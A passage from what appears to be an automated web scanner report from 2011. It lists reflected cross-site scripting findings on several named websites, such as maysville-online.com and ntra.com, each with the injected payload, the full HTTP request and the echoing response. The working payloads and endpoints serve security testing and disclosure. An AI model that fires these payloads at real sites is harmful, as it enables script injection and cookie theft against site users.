The value of the upickemSignup request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4979f'%3balert(1)//e88e0fd8bd0 was submitted in the upickemSignup parameter. This input was echoed as 4979f';alert(1)//e88e0fd8bd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/scripts/ajaxModules/upickemDeal.php?domain=http://maysville.upickem.net&id=27231&bg=eee&headerBg=330066&headerColor=FF4A00&countColor=FF4A00&regLink=true&title=&upickemSignup=4979f'%3balert(1)//e88e0fd8bd0&limit= HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1
Cookie: TNNoMobile=1

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Date: Tue, 03 May 2011 15:42:31 GMT
X-TN-ServedBy: cms.web.80
X-Loop: 1
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
Content-Length: 6220

function LoadCountDownClock(astrUniqueID,astrYear,astrMonth,astrDay,astrHour,astrMinute,astrSecond,astrFormat){var strHTML;strHTML='<div id="'+astrUniqueID+'"></div>';document.write(strHTML);CountDown
...[SNIP]...
k('dealCounter',cDates[1], cDates[2], cDates[3], cDates[4], cDates[5], cDates[6], 1);
   
       var WidgetConfig = new Object();
   WidgetConfig.DivID = 'upickemSignupForm';
   WidgetConfig.ConfigurationGUID = '4979f';alert(1)//e88e0fd8bd0';
   WidgetConfig.Scroll = 'auto';
   WidgetConfig.Height = '75';
   WidgetConfig.Width = 'auto';
   CreateEmailSignupWidget(WidgetConfig);
   }

6.74. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.maysville-online.com
Path:   /app/weather/qwikcast_feed0.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b87"%3bca31f7e83db was submitted in the REST URL parameter 1. This input was echoed as 63b87";ca31f7e83db in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app63b87"%3bca31f7e83db/weather/qwikcast_feed0.xml HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: TNNoMobile=1; s_cc=true; s_pv=no%20value; s_sq=%5B%5BB%5D%5D; __qca=P0-1669904396-1304455296993

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4682452
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:43:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5381
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp12
Content-Length: 35245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/app63b87";ca31f7e83db/weather/qwikcast_feed0.xml"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           
...[SNIP]...

6.75. http://www.maysville-online.com/app/weather/qwikcast_feed0.xml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /app/weather/qwikcast_feed0.xml

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc9ae"style%3d"x%3aexpression(alert(1))"24a7f090c0b was submitted in the REST URL parameter 1. This input was echoed as cc9ae"style="x:expression(alert(1))"24a7f090c0b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /appcc9ae"style%3d"x%3aexpression(alert(1))"24a7f090c0b/weather/qwikcast_feed0.xml HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: TNNoMobile=1; s_cc=true; s_pv=no%20value; s_sq=%5B%5BB%5D%5D; __qca=P0-1669904396-1304455296993

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4682812
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:43:41 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3848
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp1
Content-Length: 35303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/appcc9ae"style="x:expression(alert(1))"24a7f090c0b/weather/qwikcast_feed0.xml">
...[SNIP]...

6.76. http://www.maysville-online.com/content/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /content/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6350"style%3d"x%3aexpression(alert(1))"afd7046f106 was submitted in the REST URL parameter 1. This input was echoed as e6350"style="x:expression(alert(1))"afd7046f106 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /contente6350"style%3d"x%3aexpression(alert(1))"afd7046f106/ HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4789316
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:57 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.9828
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp8
Content-Length: 35454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/contente6350"style="x:expression(alert(1))"afd7046f106/">
...[SNIP]...

6.77. http://www.maysville-online.com/content/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.maysville-online.com
Path:   /content/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82f5b"%3b5974e76950d was submitted in the REST URL parameter 1. This input was echoed as 82f5b";5974e76950d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content82f5b"%3b5974e76950d/ HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4680120
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:59 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.9631
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp16
Content-Length: 35267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/content82f5b";5974e76950d/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""
   
...[SNIP]...

6.78. http://www.maysville-online.com/content/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /content/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a2e"-alert(1)-"f8cf8d87874 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/?c3a2e"-alert(1)-"f8cf8d87874=1 HTTP/1.1
Host: www.maysville-online.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TNNoMobile=1

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4640076
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 15:40:42 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3075
X-PHP-Engine: enabled
Connection: Keep-Alive
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp6
Content-Length: 35227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/content/?c3a2e"-alert(1)-"f8cf8d87874=1"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

6.79. http://www.maysville-online.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1e70"style%3d"x%3aexpression(alert(1))"7a060a3ea66 was submitted in the REST URL parameter 1. This input was echoed as e1e70"style="x:expression(alert(1))"7a060a3ea66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /e1e70"style%3d"x%3aexpression(alert(1))"7a060a3ea66 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4690004
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:52 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2412
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 35060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="https://www-dot-maysville-online-dot-com.bloxcms.com/users/login/?referer_url=/e1e70"style="x:expression(alert(1))"7a060a3ea66/">
...[SNIP]...

6.80. http://www.maysville-online.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.maysville-online.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e48b"%3b5ee898a3ded was submitted in the REST URL parameter 1. This input was echoed as 1e48b";5ee898a3ded in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /1e48b"%3b5ee898a3ded HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4689680
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:52 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2417
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp3
Content-Length: 34873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/1e48b";5ee898a3ded/"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""
   
...[SNIP]...

6.81. http://www.maysville-online.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.maysville-online.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4e4"-alert(1)-"ccebc516c28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?be4e4"-alert(1)-"ccebc516c28=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.maysville-online.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4649020
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Tue, 03 May 2011 10:47:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.2061
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: Keep-Alive
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: maysville-online.com
X-TNCMS-Served-By: cmsapp5
Content-Length: 34970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<!--
           s.pageName="http://maysville-online.com/favicon.ico?be4e4"-alert(1)-"ccebc516c28=1"
           s.server="Maysville"
           s.channel="maysville-online.com"
           s.pageType=""
           s.prop1="homepage"
           s.prop2=""
           s.prop3=""
           s.prop4=""
           s.prop5=""
           s.prop6=""
           s.prop7=""
           s.prop8=""

...[SNIP]...

6.82. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.naturalhealers.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0286<script>alert(1)</script>41cb61d962e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icod0286<script>alert(1)</script>41cb61d962e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturalhealers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:59:30 GMT
Server: Apache/2.0.52 (Red Hat) PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.9
Set-Cookie: NaturalHealers=a196283b02e135e7192e777c542f696e; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR ADMa DEVa PSAa PSDa OUR OTRa IND UNI"
x-ua-compatible: IE=EmulateIE7
Set-Cookie: info=75PfvcdfpL%252F0UPFxG06mOIitKllf7bSZghWOoeIb7CPzxLzS5LrFnQgpRhpWi%252BpFQnKrpaem5gEfIujJQGecvMIoZQ7RA7aRRDHlwebwhxlGHk9OcWkBnHgmcmlRumjPj%252B5qAvzVHhh%252Bi5bVukHcYzHN4y6vo0mnTyfDHbHilotcrXSVm7VvjjzTy1Yk5p90; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Set-Cookie: header=YToxOntzOjQ6ImluZm8iO2k6MjAwO30%253D; expires=Thu, 02-Jun-2011 10:59:30 GMT; path=/
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<h3>Sorry, the page 'favicon.icod0286<script>alert(1)</script>41cb61d962e' was not found.</h3>
...[SNIP]...

6.83. http://www.naturalhealers.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.naturalhealers.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4548a"><script>alert(1)</script>59dfafabf4d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico4548a"><script>alert(1)</script>59dfafabf4d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.naturalhealers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:59:29 GMT
Server: Apache/2.0.52 (Red Hat) PHP/4.3.9 mod_ssl/2.0.52 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.9
Set-Cookie: NaturalHealers=27faac9e321bfea0669b23eafeee200c; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR ADMa DEVa PSAa PSDa OUR OTRa IND UNI"
x-ua-compatible: IE=EmulateIE7
Set-Cookie: info=75PfvcdfpL%252BLhbseSbe%252FXg3lSY0z3e6UOqyk47lmxL74FP7ujUOawM9vS4nN7p%252FxfPD7ImrWMkdh8HVIIeZlndLiVyafXt4IvqHgOuADGACeooJ%252BGImZAaLYU7ZnuzbCqbAd1LAml2aKTR5%252F8DoxIhooreGxpgbd2BJ4tNdIfArHZAhos008REY%252FIneiuUbV; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Set-Cookie: header=YToxOntzOjQ6ImluZm8iO2k6MjA0O30%253D; expires=Thu, 02-Jun-2011 10:59:29 GMT; path=/
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 13415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="conte
...[SNIP]...
<input onclick="open_subscribe_window('em_footer_widget','anh:favicon.ico4548a"><script>alert(1)</script>59dfafabf4d')" type="image" src="/img/subscriber/email_subscribe_btn.png" />
...[SNIP]...

6.84. http://www.ntra.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ntra.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d785d'-alert(1)-'27403f71a0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.icod785d'-alert(1)-'27403f71a0a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ntra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:23:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.3.0
Expires: Tue, 03 May 2011 11:28:04 GMT
Cache-control:
Pragma:
Content-Length: 56452

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content
...[SNIP]...
uContainer1").toggle();
    //$("#subMenuContainer1").slideUp("slow");
    // $('#subMenuContainer').html(data.output);
            //$("#subMenuContainer1").slideDown("slow");
}
var requequestURL = '/favicon.icod785d'-alert(1)-'27403f71a0a';
var urlFound=0;
$(document).ready(function(){
$('a[rev=NTRAMENU]').each(function() {
       if($(this).attr('href')==requequestURL){
               changeImage($(this).attr('parentId'));
               urlFound=1;
               return
...[SNIP]...

6.85. http://www.ontargetpayday.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ontargetpayday.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae710"><script>alert(1)</script>d9f5089b7b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico?ae710"><script>alert(1)</script>d9f5089b7b4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ontargetpayday.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:50:58 GMT
Server: Apache/2.2.3 (Debian) mod_jk/1.2.18 mod_ssl/2.2.3 OpenSSL/0.9.8c
Set-Cookie: JSESSIONID=202343562D543C98EE85C48CFDA9FCB4; Path=/i
Content-Length: 301
Content-Type: text/html;charset=UTF-8


<html>
<head><title>www.ontargetpayday.com Home Page</title></head>
   <frameset rows="100%,*" border="0">
   <frame src="welcome.do?&ae710"><script>alert(1)</script>d9f5089b7b4=1&pid=1081&sid=SITE_APPLY_NOW" frameborder="0">
...[SNIP]...

6.86. http://www.osbornewood.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.osbornewood.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2a3a"><script>alert(1)</script>8f0a1a4c44b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoc2a3a"><script>alert(1)</script>8f0a1a4c44b HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.osbornewood.com
